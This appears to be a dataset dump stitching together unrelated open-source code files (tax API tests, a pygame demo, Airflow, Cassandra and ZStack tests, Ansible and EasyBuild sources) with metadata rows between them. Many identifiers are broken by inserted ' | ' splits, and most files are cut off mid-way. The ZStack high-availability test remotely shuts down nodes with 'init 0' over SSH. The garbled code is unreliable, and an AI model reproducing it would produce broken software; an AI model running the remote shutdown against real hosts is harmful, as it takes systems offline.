doc.validate()
api = get_api()
lat = 47.627935
lng = -122.51702
with pytest.raises(AvalaraTypeException) as e:
api.get_tax(lat, lng, 'foo', None)
assert e.value.code == AvalaraException.CODE_BAD_DOC
with pytest.raises(AvalaraException) as e:
api.get_tax(lat, lng, None, None)
assert e.value.code == AvalaraException.CODE_BAD_ARGS
@pytest.mark.post_tax
@pytest.mark.testing
def test_justtozip():
api = get_api()
doc = Document.new_sales_order(DocDate=datetime.date.today(), CustomerCode='jobelenus@activefrequency.com')
doc.add_from_address(Line1="100 Ravine Lane NE", Line2="#220", PostalCode="98110")
doc.add_to_address(Line1="", Line2="", PostalCode="98110")
doc.add_line(Amount=10.00)
doc.add_line(Amount=10.00)
doc.add_line(TaxCode='FR', Amount='10.00')
# make sure i don't have a doccode
try:
doc.DocCode
|
mark-me/Pi-Jukebox | venv/Lib/site-packages/pygame/examples/vgrade.py | Python | agpl-3.0 | 3,320 | 0.005422 | #!/usr/bin/env python
"""This example demonstrates creating an image with numpy
python, and displaying that through SDL. You can look at the
method of importing numpy and pygame.surfarray. This method
will fail 'gracefully' if it is not available.
I've tried mixing in a lot of comments where the code might
not be self explanatory, nonetheless it may still seem a bit
strange. Learning to use numpy for images like this takes a
bit of learning, but the payoff is extremely fast image
manipulation in python.
For Pygame 1.9.2 and up, this example also showcases a new feature
of surfarray.blit_surface: array broadcasting. If a source array
has either a width or height of 1, the array is repeatedly blitted
to the surface along that dimension to fill the surface. In fact,
a (1, 1) or (1, 1, 3) array results in a simple surface color fill.
Just so you know how this breaks down. For each sampling of
time, 30% goes to each c | reating the gradient and blitting the
array. The final 40% goes to flipping/updating the display surface
If using an SDL version at least 1.1.8 the window will have
no border decorations.
The code also demonstrates use of the timer events."""
import os, pygame
from pygame.locals import *
try:
from numpy import *
fro | m numpy.random import *
except ImportError:
raise SystemExit('This example requires numpy and the pygame surfarray module')
pygame.surfarray.use_arraytype('numpy')
timer = 0
def stopwatch(message = None):
"simple routine to time python code"
global timer
if not message:
timer = pygame.time.get_ticks()
return
now = pygame.time.get_ticks()
runtime = (now - timer)/1000.0 + .001
print ("%s %s %s" %
(message, runtime, ('seconds\t(%.2ffps)'%(1.0/runtime))))
timer = now
def VertGradientColumn(surf, topcolor, bottomcolor):
"creates a new 3d vertical gradient array"
topcolor = array(topcolor, copy=0)
bottomcolor = array(bottomcolor, copy=0)
diff = bottomcolor - topcolor
width, height = surf.get_size()
# create array from 0.0 to 1.0 triplets
column = arange(height, dtype='float')/height
column = repeat(column[:, newaxis], [3], 1)
# create a single column of gradient
column = topcolor + (diff * column).astype('int')
# make the column a 3d image column by adding X
column = column.astype('uint8')[newaxis,:,:]
#3d array into 2d array
return pygame.surfarray.map_array(surf, column)
def DisplayGradient(surf):
"choose random colors and show them"
stopwatch()
colors = randint(0, 255, (2, 3))
column = VertGradientColumn(surf, colors[0], colors[1])
pygame.surfarray.blit_array(surf, column)
pygame.display.flip()
stopwatch('Gradient:')
def main():
pygame.init()
pygame.mixer.quit() # remove ALSA underflow messages for Debian squeeze
size = 600, 400
os.environ['SDL_VIDEO_CENTERED'] = '1'
screen = pygame.display.set_mode(size, NOFRAME, 0)
pygame.event.set_blocked(MOUSEMOTION) #keep our queue cleaner
pygame.time.set_timer(USEREVENT, 500)
while 1:
event = pygame.event.wait()
if event.type in (QUIT, KEYDOWN, MOUSEBUTTONDOWN):
break
elif event.type == USEREVENT:
DisplayGradient(screen)
if __name__ == '__main__': main()
|
dhuang/incubator-airflow | tests/providers/microsoft/azure/hooks/test_azure_data_factory.py | Python | apache-2.0 | 15,858 | 0.004414 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from unittest.mock import MagicMock, Mock
import pytest
from pytest import fixture
from airflow.exceptions import AirflowException
from airflow.models.connection import Connection
from airflow.providers.microsoft.azure.hooks.azure_data_factory import (
AzureDataFactoryHook,
provide_targeted_factory,
)
from airflow.utils import db
DEFAULT_RESOURCE_GROUP = "defaultResourceGroup"
RESOURCE_GROUP = "testResourceGroup"
DEFAULT_FACTORY = "defaultFactory"
FACTORY = "testFactory"
MODEL = object()
NAME = "testName"
ID = "testId"
def setup_module():
connection = Connection(
conn_id="azure_data_factory_test",
conn_type="azure_data_factory",
login="clientId",
password="clientSecret",
extra=json.dumps(
{
"tenantId": "tenantId",
"subscriptionId": "subscriptionId",
"resourceGroup": DEFAULT_RESOURCE_GROUP,
"factory": DEFAULT_FACTORY,
}
),
)
db.merge_conn(connection)
@fixture
def hook():
client = AzureDataFactoryHook(conn_id="azure_data_factory_test")
client._conn = MagicMock(
spec=[
"factories",
"linked_services",
"datasets",
"pipelines",
"pipeline_runs",
"triggers",
"trigger_runs",
]
)
return client
def parametrize(explicit_factory, implicit_factory):
def wrapper(func):
return pytest.mark.parametrize(
("user_args", "sdk_args"),
(explicit_factory, implicit_factory),
ids=("explicit factory", "implicit factory"),
)(func)
return wrapper
def test_provide_targeted_factory():
def echo(_, resource_group_name=None, factory_name=None):
return resource_group_name, factory_name
conn = MagicMock()
hook = MagicMock()
hook.get_connection.return_value = conn
conn.extra_dejson = {}
assert provide_targeted_factory(echo)(hook, RESOURCE_GROUP, FACTORY) == (RESOURCE_GROUP, FACTORY)
conn.extra_dejson = {"resourceGroup": DEFAULT_RESOURCE_GROUP, "factory": DEFAULT_FACTORY}
assert provide_targeted_factory(echo)(hook) == (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY)
with pytest.raises(AirflowException):
conn.extra_dejson = {}
provide_targeted_factory(echo)(hook)
@parametrize(
explicit_factory=((RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY)),
implicit_factory=((), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY)),
)
def test_get_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.get_factory(*user_args)
hook._conn.factories.get.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, MODEL)),
implicit_factory=((MODEL,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, MODEL)),
)
def test_create_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.create_factory(*user_args)
hook._conn.factories.create_or_update.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, MODEL)),
implicit_factory=((MODEL,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, MODEL)),
)
def test_update_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
hook._factory_exists = Mock(return_value=True)
hook.update_factory(*user_args)
hook._conn.factories.create_or_update.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, MODEL)),
implicit_factory=((MODEL,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, MODEL)),
)
def test_update_factory_non_existent(hook: AzureDataFactoryHook, user_args, sdk_args):
hook._factory_exists = Mock(return_value=False)
with pytest.raises(AirflowException, match=r"Factory .+ does not exist"):
hook.update_factory(*user_args)
@parametrize(
explicit_factory=((RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY)),
implicit_factory=((), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY)),
)
def tes | t_delete_factory(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.delete_factory(*user_args)
hook._conn.factories.delete.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((NAME, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME)),
implicit_factory=((NA | ME,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME)),
)
def test_get_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.get_linked_service(*user_args)
hook._conn.linked_services.get.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_create_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.create_linked_service(*user_args)
hook._conn.linked_services.create_or_update(*sdk_args)
@parametrize(
explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_update_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
hook._linked_service_exists = Mock(return_value=True)
hook.update_linked_service(*user_args)
hook._conn.linked_services.create_or_update(*sdk_args)
@parametrize(
explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_update_linked_service_non_existent(hook: AzureDataFactoryHook, user_args, sdk_args):
hook._linked_service_exists = Mock(return_value=False)
with pytest.raises(AirflowException, match=r"Linked service .+ does not exist"):
hook.update_linked_service(*user_args)
@parametrize(
explicit_factory=((NAME, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME)),
implicit_factory=((NAME,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME)),
)
def test_delete_linked_service(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.delete_linked_service(*user_args)
hook._conn.linked_services.delete.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((NAME, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME)),
implicit_factory=((NAME,), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME)),
)
def test_get_dataset(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.get_dataset(*user_args)
hook._conn.datasets.get.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_create_dataset(hook: AzureDataFactoryHook, user_args, sdk_args):
hook.create_dataset(*user_args)
hook._conn.datasets.create_or_update.assert_called_with(*sdk_args)
@parametrize(
explicit_factory=((NAME, MODEL, RESOURCE_GROUP, FACTORY), (RESOURCE_GROUP, FACTORY, NAME, MODEL)),
implicit_factory=((NAME, MODEL), (DEFAULT_RESOURCE_GROUP, DEFAULT_FACTORY, NAME, MODEL)),
)
def test_update_dataset(hoo |
kyungmi/webida-server | src/ext/cordova-weinre/weinre.build/scripts/build-target-scripts.py | Python | apache-2.0 | 5,339 | 0.008054 | #!/usr/bin/env python
# ---
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# ---
import os
import re
import sys
import json
import optparse
#--------------------------------------------------------------------
def main():
#----------------------------------------------------------------
if len(sys.argv) < 3:
error("expecting parameters srcDir outputDir")
srcDirName = sys.argv[1]
oDirName = sys.argv[2]
if not os.path.exists(srcDirName): error("source directory not found: '" + srcDirName + "'")
if not os.path.isdir(srcDirName): error("source directory not a directory: '" + srcDirName + "'")
if not os.path.exists(oDirName): error("output directory not found: '" + oDirName + "'")
if not os.path.isdir(oDirName): error("output directory not a directory: '" + oDirName + "'")
#----------------------------------------------------------------
scripts = []
scriptNames = {}
scriptSrc = {}
scriptMin = {}
includedFiles = []
includedFiles.append("modjewel.js")
entries = os.listdir(os.path.join(srcDirName, "weinre/common"))
for entry in entries:
includedFiles.append("weinre/common/%s" % entry)
entries = os.listdir(os.path.join(srcDirName, "weinre/target"))
for entry in entries:
| includedFiles.append("weinre/target/%s" % entry)
includedFiles.append("interfaces/all-json-idls-min.js")
for includedFile in includedFiles:
baseScriptFile = includedFile
sc | riptFile = os.path.join(srcDirName, baseScriptFile)
if not os.path.exists(scriptFile):
error("script file not found: '" + scriptFile + "'")
scripts.append(scriptFile)
scriptNames[scriptFile] = baseScriptFile
with open(scriptFile, "r") as iFile:
scriptSrc[scriptFile] = iFile.read()
scriptMin[scriptFile] = min(scriptSrc[scriptFile])
# log("read: %s" % scriptFile)
#----------------------------------------------------------------
oFileName = os.path.join(oDirName, "target-script.js")
writeMergedFile(oFileName, scripts, scriptNames, scriptSrc, True)
#----------------------------------------------------------------
oFileName = os.path.join(oDirName, "target-script-min.js")
writeMergedFile(oFileName, scripts, scriptNames, scriptMin, False)
#--------------------------------------------------------------------
def writeMergedFile(oFileName, scripts, scriptNames, srcs, useEval):
lines = []
licenseFile = os.path.join(os.path.dirname(__file__), "..", "LICENSE-header.js")
with open(licenseFile, "r") as iFile:
lines.append(iFile.read())
lines.append(";(function(){")
for script in scripts:
src = srcs[script]
srcName = scriptNames[script]
if not useEval:
lines.append("// %s" % srcName)
lines.append(src)
lines.append(";")
else:
src = "%s\n//@ sourceURL=%s" % (src, srcName)
lines.append(";eval(%s)" % json.dumps(src))
if srcName == "modjewel.js":
lines.append("modjewel.require('modjewel').warnOnRecursiveRequire(true);")
if not useEval:
lines.append("")
lines.append("// modjewel.require('weinre/common/Weinre').showNotImplemented();")
lines.append("modjewel.require('weinre/target/Target').main()")
lines.append("})();")
targetScript = "\n".join(lines)
with open(oFileName, "w") as oFile:
oFile.write(targetScript)
log("generated: %s" % oFileName)
#--------------------------------------------------------------------
def min(script):
patternCommentC = re.compile(r"/\*.*?\*/", re.MULTILINE + re.DOTALL)
patternCommentCPP = re.compile(r"(?<!\\)//.*?$", re.MULTILINE)
patternIndent = re.compile(r"^\s*", re.MULTILINE)
patternBlankLine = re.compile(r"^\s*\n", re.MULTILINE)
script = patternCommentC.sub( "", script)
script = patternCommentCPP.sub( "", script)
script = patternIndent.sub( "", script)
script = patternBlankLine.sub( "", script)
return script
#--------------------------------------------------------------------
def log(message):
message = "%s: %s" % (PROGRAM_NAME, message)
print >>sys.stderr, message
#--------------------------------------------------------------------
def error(message):
log(message)
sys.exit(-1)
#--------------------------------------------------------------------
PROGRAM_NAME = os.path.basename(sys.argv[0])
main()
|
azavea/nyc-trees | src/nyc_trees/apps/core/migrations/0021_auto_20150408_1216.py | Python | agpl-3.0 | 660 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
de | pendencies = [
('core', '0020_auto_20150323_1457'),
]
operations = [
migrations.AddField(
model_name='user',
name='progress_page_help_shown',
field=models.BooleanField(default=False), |
preserve_default=True,
),
migrations.AddField(
model_name='user',
name='reservations_page_help_shown',
field=models.BooleanField(default=False),
preserve_default=True,
),
]
|
gppezzi/easybuild-framework | easybuild/toolchains/cgmvapich2.py | Python | gpl-2.0 | 1,589 | 0.001888 | ##
# Copyright 2013-2019 Ghent University
#
# T | his file is triple-licensed under GPLv2 (see below), MIT, and
# BSD three-clause licenses.
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent Univ | ersity (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for cgmvapich2 compiler toolchain (includes Clang, GFortran and MVAPICH2).
:author: Dmitri Gribenko (National Technical University of Ukraine "KPI")
"""
from easybuild.toolchains.clanggcc import ClangGcc
from easybuild.toolchains.mpi.mvapich2 import Mvapich2
class Cgmvapich2(ClangGcc, Mvapich2):
"""Compiler toolchain with Clang, GFortran and MVAPICH2."""
NAME = 'cgmvapich2'
SUBTOOLCHAIN = ClangGcc.NAME
|
aweisberg/cassandra-dtest | sstable_generation_loading_test.py | Python | apache-2.0 | 17,757 | 0.003097 | import os
import subprocess
import time
import distutils.dir_util
from distutils.version import LooseVersion
import pytest
import logging
from ccmlib import common as ccmcommon
from dtest import Tester, create_ks, create_cf, MAJOR_VERSION_4
from tools.assertions import assert_all, assert_none, assert_one
since = pytest.mark.since
logger = logging.getLogger(__name__)
# WARNING: sstableloader tests should be added to TestSSTableGenerationAndLoading (below),
# and not to BaseSStableLoaderTest (which is shared with upgrade tests)
# Also used by upgrade_tests/storage_engine_upgrade_test
# to test loading legacy sstables
class TestBaseSStableLoader(Tester):
@pytest.fixture(autouse=True)
def fixture_add_additional_log_patterns(self, fixture_dtest_setup):
fixture_dtest_setup.allow_log_errors = True
upgrade_from = None
test_compact = False
def compact(self):
return self.fixture_dtest_setup.cluster.version() < MAJOR_VERSION_4 and self.test_compact
def create_schema(self, session, ks, compression):
create_ks(session, ks, rf=2)
create_cf(session, "standard1", compression=compression, compact_storage=self.compact())
create_cf(session, "counter1", compression=compression, columns={'v': 'counter'},
compact_storage=self.compact())
def skip_base_class_test(self):
if self.__class__.__name__ != 'TestBasedSSTableLoader' and self.upgrade_from is None:
pytest.skip("Don't need to run base class test, only derived classes")
def create_schema_40(self, session, ks, compression):
create_ks(session, ks, rf=2)
create_cf(session, "standard1", compression=compression, compact_storage=self.compact())
create_cf(session, "counter1", key_type='text', compression=compression, columns={'column1': 'text',
'v': 'counter static',
'value': 'counter'},
primary_key="key, column1", clustering='column1 ASC', compact_storage=self.compact())
def test_sstableloader_compression_none_to_none(self):
self.skip_base_class_test()
self.load_sstable_with_configuration(None, None)
def test_sstableloader_compression_none_to_snappy(self):
self.skip_base_class_test()
self.load_sstable_with_configuration(None, 'Snappy')
def test_sstableloader_compression_none_to_deflate(self):
self.skip_base_class_test()
self.load_sstable_with_configuration(None, 'Deflate')
def test_sstableloader_compression_snappy_to_none(self):
self.skip_base_class_test()
self.load_sstable_with_configuration('Snappy', None)
def test_sstableloader_compression_snappy_to_snappy(self):
self.skip_base_class_test()
self.load_sstable_with_configuration('Snappy', 'Snappy')
def test_sstableloader_compression_snappy_to_deflate(self):
self.skip_base_class_test()
self.load_sstable_with_configuration('Snappy', 'Deflate')
def test_sstableloader_compression_deflate_to_none(self):
self.skip_base_class_test()
self.load_sstable_with_configuration('Deflate', None)
def test_sstableloader_compression_deflate_to_snappy(self):
self.skip_base_class_test()
self.load_sstable_with_configuration('Deflate', 'Snappy')
def test_sstableloader_compression_deflate_to_deflate(self):
self.skip_base_class_test()
self.load_sstable_with_configuration('Deflate', 'Deflate')
def test_sstableloader_with_mv(self):
"""
@jira_ticket CASSANDRA-11275
"""
self.skip_base_class_test()
def create_schema_with_mv(session, ks, compression):
self.create_schema(session, ks, compression)
# create a materialized view
session.execute("CREATE MATERIALIZED VIEW mv1 AS "
"SELECT key FROM standard1 WHERE key IS NOT NULL AND c IS NOT NULL AND v IS NOT NULL "
"PRIMARY KEY (v)")
self.load_sstable_with_configuration(ks='"Keyspace1"', create_schema=create_schema_with_mv)
def copy_sstables(self, cluster, node):
for x in range(0, cluster.data_dir_count):
data_dir = os.path.join(node.get_path(), 'data{0}'.format(x))
copy_root = os.path.join(node.get_path(), 'data{0}_copy'.format(x))
for ddir in os.listdir(data_dir):
keyspac | e_dir = os.path.join(data_dir, ddir)
if os.path.isdir(keyspace_dir) and ddir != 'system':
copy_dir = os.path.join(copy_root, ddir)
distutils.dir_util.copy_tree(keyspace_dir, copy_dir)
def load_sstables(self, cluster, node, ks):
cdir = node.get_i | nstall_dir()
sstableloader = os.path.join(cdir, 'bin', ccmcommon.platform_binary('sstableloader'))
env = ccmcommon.make_cassandra_env(cdir, node.get_path())
host = node.address()
for x in range(0, cluster.data_dir_count):
sstablecopy_dir = os.path.join(node.get_path(), 'data{0}_copy'.format(x), ks.strip('"'))
for cf_dir in os.listdir(sstablecopy_dir):
full_cf_dir = os.path.join(sstablecopy_dir, cf_dir)
if os.path.isdir(full_cf_dir):
cmd_args = [sstableloader, '--nodes', host, full_cf_dir]
p = subprocess.Popen(cmd_args, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
stdout, stderr = p.communicate()
exit_status = p.returncode
logger.debug('stdout: {out}'.format(out=stdout.decode("utf-8")))
logger.debug('stderr: {err}'.format(err=stderr.decode("utf-8")))
assert 0 == exit_status, \
"sstableloader exited with a non-zero status: {}".format(exit_status)
def load_sstable_with_configuration(self, pre_compression=None, post_compression=None, ks="ks", create_schema=create_schema):
"""
tests that the sstableloader works by using it to load data.
Compression of the columnfamilies being loaded, and loaded into
can be specified.
pre_compression and post_compression can be these values:
None, 'Snappy', or 'Deflate'.
"""
NUM_KEYS = 1000
for compression_option in (pre_compression, post_compression):
assert compression_option in (None, 'Snappy', 'Deflate')
logger.debug("Testing sstableloader with pre_compression=%s and post_compression=%s" % (pre_compression, post_compression))
if self.upgrade_from:
logger.debug("Testing sstableloader with upgrade_from=%s and compact=%s" % (self.upgrade_from, self.compact))
cluster = self.cluster
if self.upgrade_from:
logger.debug("Generating sstables with version %s" % (self.upgrade_from))
default_install_version = self.cluster.version()
default_install_dir = self.cluster.get_install_dir()
# Forcing cluster version on purpose
cluster.set_install_dir(version=self.upgrade_from)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
logger.debug("Using jvm_args={}".format(self.jvm_args))
cluster.populate(2).start(jvm_args=list(self.jvm_args))
node1, node2 = cluster.nodelist()
time.sleep(.5)
logger.debug("creating keyspace and inserting")
session = self.cql_connection(node1)
self.create_schema(session, ks, pre_compression)
for i in range(NUM_KEYS):
session.execute("UPDATE standard1 SET v='{}' WHERE KEY='{}' AND c='col'".format(i, i))
session.execute("UPDATE counter1 SET v=v+1 WHERE KEY='{}'".format(i))
#Will upgrade to a version that doesn't support compact storage so revert the compact
#storage, this doesn't actually fix it yet
if self.compact() and default_install_version >= MAJOR_VERSION_4:
session.execute('alter table standa |
timkral/horn | heimdall/setup/__init__.py | Python | bsd-3-clause | 21 | 0 | __author__ | = 'tkral | '
|
bootswithdefer/ansible | v2/ansible/errors/__init__.py | Python | gpl-3.0 | 6,977 | 0.004586 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.errors.yaml_strings import *
class AnsibleError(Exception):
'''
This is the base class for all errors raised from Ansible code,
and can be instantiated with two optional parameters beyond the
error message to control whether detailed information is displayed
when the error occurred while parsing a data file of some kind.
Usage:
raise AnsibleError('some message here', obj=obj, show_content=True)
Where "obj" is some subclass of ansible.parsing.yaml.objects.AnsibleBaseYAMLObject,
which should be returned by the DataLoader() class.
'''
def __init__(self, message, obj=None, show_content=True):
# we import this here to prevent an import loop problem,
# since the objects code also imports ansible.errors
from ansible.parsing.yaml.objects import AnsibleBaseYAMLObject
self._obj = obj
self._show_content = show_content
if obj and isinstance(obj, AnsibleBaseYAMLObject):
extended_error = self._get_extended_error()
if extended_error:
self.message = 'ERROR! %s\n\n%s' % (message, extended_error)
else:
self.message = 'ERROR! %s' % message
def __str__(self):
return self.message
def __repr__(self):
return self.message
def _get_error_lines_from_file(self, file_name, line_number):
'''
Returns the line in the file which coresponds to the reported error
location, as well as the line preceding it (if the error did not
occur on the first line), to provide context to the error.
'''
target_line = ''
prev_line = ''
with open(file_name, 'r') as f:
lines = f.readlines()
target_line = lines[line_number]
if line_number > 0:
prev_line = lines[line_number - 1]
return (target_line, prev_line)
def _get_extended_error(self):
'''
Given an object reporting the location of the exception in a file, return
detailed information regarding it including:
* the line which caused the error as well as the one preceding it
* causes and suggested remedies for common syntax errors
If this error was created with show_content=False, the reporting of content
is suppressed, as the file contents may be sensitive (ie. vault data).
'''
error_message = ''
try:
(src_file, line_number, col_number) = self._obj.ansible_pos
error_message += YAML_POSITION_DETAILS % (src_file, line_number, col_number)
if src_file not in ('<string>', '<unicode>') and self._show_content:
(target_line, prev_line) = self._get_error_lines_from_file(src_file, line_number - 1)
if target_line:
stripped_line = target_line.replace(" ","")
arrow_line = (" " * (col_number-1)) + "^ here"
#header_line = ("=" * 73)
error_message += "\nThe offending line appears to be:\n\n%s\n%s\n%s\n" % (prev_line.rstrip(), target_line.rstrip(), arrow_line)
# common error/remediation checking here:
# check for unquoted vars starting lines
if ('{{' in target_line and '}}' in target_line) and ('"{{' not in target_line or "'{{" not in target_line):
error_message += YAML_COMMON_UNQUOTED_VARIABLE_ERROR
# check for common dictionary mistakes
elif ":{{" in stripped_line and "}}" in stripped_line:
error_message += YAML_COMMON_DICT_ERROR
# check for common unquoted colon mistakes
elif len(target_line) and len(target_line) > 1 and len(target_line) > col_number and target_line[col_number] == ":" and target_line.count(':') > 1:
error_message += YAML_COMMON_UNQUOTED_COLON_ERROR
# otherwise, check | for some common quoting mistakes
else:
parts = target_line.split(": | ")
if len(parts) > 1:
middle = parts[1].strip()
match = False
unbalanced = False
if middle.startswith("'") and not middle.endswith("'"):
match = True
elif middle.startswith('"') and not middle.endswith('"'):
match = True
if len(middle) > 0 and middle[0] in [ '"', "'" ] and middle[-1] in [ '"', "'" ] and target_line.count("'") > 2 or target_line.count('"') > 2:
unbalanced = True
if match:
error_message += YAML_COMMON_PARTIALLY_QUOTED_LINE_ERROR
if unbalanced:
error_message += YAML_COMMON_UNBALANCED_QUOTES_ERROR
except (IOError, TypeError):
error_message += '\n(could not open file to display line)'
except IndexError:
error_message += '\n(specified line no longer in file, maybe it changed?)'
return error_message
class AnsibleParserError(AnsibleError):
''' something was detected early that is wrong about a playbook or data file '''
pass
class AnsibleInternalError(AnsibleError):
''' internal safeguards tripped, something happened in the code that should never happen '''
pass
class AnsibleRuntimeError(AnsibleError):
''' ansible had a problem while running a playbook '''
pass
class AnsibleModuleError(AnsibleRuntimeError):
''' a module failed somehow '''
pass
class AnsibleConnectionFailure(AnsibleRuntimeError):
''' the transport / connection_plugin had a fatal error '''
pass
class AnsibleFilterError(AnsibleRuntimeError):
''' a templating failure '''
pass
class AnsibleUndefinedVariable(AnsibleRuntimeError):
''' a templating failure '''
pass
|
sburnett/seattle | repy/tests/ut_repytests_veryslownetsend-testrecv.py | Python | mit | 382 | 0.065445 | #pragma out
#pragma repy restri | ctions.veryslownetsend
def foo(ip,port,sock, mainch, ch):
data = sock.recv(1000)
print ip,port,data
stopcomm(ch)
stopcomm(mainch)
if callfunc == 'initialize':
ip = getmyip()
waitforconn(ip,<connport>,foo)
sleep(.1)
csock = openconn(ip,<connport>)
csock.send( | 'Hello, this is too long for such a short time')
sleep(.5)
exitall()
|
zstackorg/zstack-woodpecker | integrationtest/vm/ha/test_all_nodes_recovery_with_one_cmd_create_vm.py | Python | apache-2.0 | 1,972 | 0.005578 | '''
Integration Test for creating KVM VM with all nodes shutdown and recovered.
@author: Quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import test_stub
import time
import os
vm = None
def test():
global vm
cmd = "init 0"
host_username = os.environ.get('nodeUserName')
host_password = os.environ.get('nodePassword')
zstack_ha_vip = os.environ.get('zstackHaVip')
node1_ip = os.environ.get('node1Ip')
test_util.test_logger("shutdown node: %s" % (node1_ip))
rsp = test_lib.lib_execute_ssh_cmd(node1_ip, host_username, host_password, cmd, 180)
node2_ip = os.environ.get('node2Ip')
test_util.test_logger("shutdown node: %s" % (node2_ip))
rsp = test_lib.lib_execute_ssh_cmd(node2_ip, host_username, host_password, cmd, 180)
test_util.test_logger("recover node: %s" % (node1_ip))
os.system('bash -ex %s %s' % (os.environ.get('nodeRecoverScript'), node1_ip))
test_util.test_logger("recover node: %s" % (node2_ip))
os.system('bash -ex %s %s' % (os.environ.get('nodeRecoverScript'), node2_ip))
cmd = "zstack-ctl recover_ha"
